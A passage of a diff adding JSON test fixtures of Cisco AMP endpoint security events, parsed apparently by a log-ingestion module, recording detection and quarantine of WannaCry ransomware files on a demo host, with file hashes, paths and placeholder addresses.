"process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.4A468603FD.04426d77.auto.Talos", + "cisco.amp.detection_id": "6419303574240493597", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 430000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "file.name": "taskdl.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 33372, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493595", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 327000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 34828, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 313000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "@WanaDecryptor@.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 36357, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493595", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 37912, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 39032, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526290", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 40152, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526289", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 41272, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 42392, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558982", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 43512, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558980", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 44698, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558979", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 45884, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558978", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 47070, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.2CA2D550E6-100.SBX.VIOC", + "cisco.amp.detection_id": "6419303569945526290", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 580000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "8495400f199ac77853c53b5a3f278f3e", + "file.hash.sha1": "be5d6279874da315e3080b06083757aad9b32c23", + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "file.name": "taskse.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 48256, + "process.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "process.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "8495400f199ac77853c53b5a3f278f3e", + "be5d6279874da315e3080b06083757aad9b32c23" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.4A468603FD.04426d77.auto.Talos", + "cisco.amp.detection_id": "6419303569945526289", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 564000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "4fef5e34143e646dbf9907c4374276f5", + "file.hash.sha1": "47a9ad4125b6bd7c55e4e7da251e23f089407b8f", + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "file.name": "taskdl.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49887, + "process.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "process.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "4fef5e34143e646dbf9907c4374276f5", + "47a9ad4125b6bd7c55e4e7da251e23f089407b8f" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558981", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 51525, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558977", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 52645, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558984", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 791000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 53765, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 